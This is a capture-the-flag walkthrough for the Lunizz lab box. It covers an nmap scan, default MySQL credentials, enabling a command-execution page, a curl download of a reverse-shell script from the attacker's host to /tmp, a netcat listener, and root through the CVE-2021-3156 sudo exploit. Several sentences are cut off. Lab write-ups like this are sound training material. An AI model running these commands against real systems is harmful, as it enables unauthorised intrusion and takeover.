Link to the ctf: Lunizz CTF
# Nmap 7.80 scan initiated Wed Feb 24 23:41:07 2021 as: nmap -sV -sC -p- -T4 -oN nmap.log 10.10.115.79 Nmap scan report for 10.10.115.79 Host is up (0.087s latency). Not shown: 65530 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 f8:08:db:be:ed:80:d1:ef:a4:b0:a9:e8:2d:e2:dc:ee (RSA) | 256 79:01:d6:df:8b:0a:6e:ad:b7:d8:59:9a:94:0a:09:7a (ECDSA) |_ 256 b1:a9:ef:bb:7e:5b:01:cd:4c:8e:6b:bf:56:5d:a7:f4 (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works 3306/tcp open mysql MySQL 5.7.32-0ubuntu0.18.04.1 | mysql-info: | Protocol: 10 | Version: 5.7.32-0ubuntu0.18.04.1 | Thread ID: 3 | Capabilities flags: 65535 | Some Capabilities: Support41Auth, ConnectWithDatabase, FoundRows, IgnoreSigpipes, SupportsTransactions, LongPassword, ODBCClient, SwitchToSSLAfterHandshake, InteractiveClient, LongColumnFlag, SupportsCompression, Speaks41ProtocolOld, DontAllowDatabaseTableColumn, IgnoreSpaceBeforeParenthesis, Speaks41ProtocolNew, SupportsLoadDataLocal, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins | Status: Autocommit | Salt: `|lXPJ\x1CK5G";6\x10y | Nq@Z |_ Auth Plugin Name: mysql_native_password 4444/tcp open krb524? | fingerprint-strings: | GetRequest: | Can you decode this for me? | bGV0bWVpbg== | Wrong Password | NULL, SSLSessionReq: | Can you decode this for me? |_ bGV0bWVpbg== 5000/tcp open upnp? | fingerprint-strings: | NULL: | OpenSSH 5.1 |_ Unable to load config info from /usr/local/ssl/openssl.cnf
dirsearch with the wordlist
SecLists/Discovery/Web-Content/raft-large-files.txt the webserver, we found a file called
Made By CTF_SCRIPTS_CAVE (not real) Thanks for installing our ctf script #Steps - Create a mysql user ([REDACTED]:[REDACTED]) - Change necessary lines of config.php file Done you can start using ctf script #Notes please do not use default creds (IT'S DANGEROUS) <<<<<<<<<---------------------------- READ THIS LINE PLEASE
In the webpage, we also found
/whatever/index.php (again by using
dirsearch and the wordlist
SecLists/Discovery/Web-Content/raft-large-directories.txt) with a input field that could pontentially execute code, but it doesn’t work right now.
Command Executer Mode :0 it kinda tells me that this function is disabled.
We can connect to
MySQL by issuing the following command:
mysql -u USERNAME -pPASSOWRD -h VICTIM_IP
In the MySQL service, we have a database called
runornot, containing a table called
run with only one value:
I tried to change the value of the row.
UPDATE runcheck SET run=1;
Remote Code Execution
I went again to the
/whatever/index.php and I saw that
Command Executer Mode is set to
So tried again to use the input
And we got RCE.
I then used asio to get a reverse shell.
asio -H MY_IP -P 8080 -A -B
I then created a file called
shell.sh and put the one-liner from
asio in it.
I opened a listener for the reverse shell.
rlwrap nc -vlp 8080
and then used
python3 -m http.server to create a webserver.
NOTE: the command MUST run inside the same folder as
download the script on the target machine:
$(curl YOUR_IP:8000/shell.sh -o /tmp/)
and then execute it
Sudo is vulnerable to the CVE-2021-3156, this is the unintentional way that I found to get root.
I first cloned the repo on my machine where the python webserver is still running
Moving to the reverse shell: I created a folder inside
privesc, download the necessary files from the python webserver, issue
make and then execute
mkdir /tmp/privesc cd /tmp/privesc wget YOUR_IP:8000/CVE-2021-3156/Makefile wget YOUR_IP:8000/CVE-2021-3156/hax.c wget YOUR_IP:8000/CVE-2021-3156/lib.c make ./sudo-hax-me-a-sandwich
we can check which argument we can supply to it by issuing the following command:
In this way, we see that the version of Ubuntu is
18.04.5 LTS (Bionic Beaver) so accordingly to
sudo-hax-me-a-sandwich, we have to supply the argument
and we got root.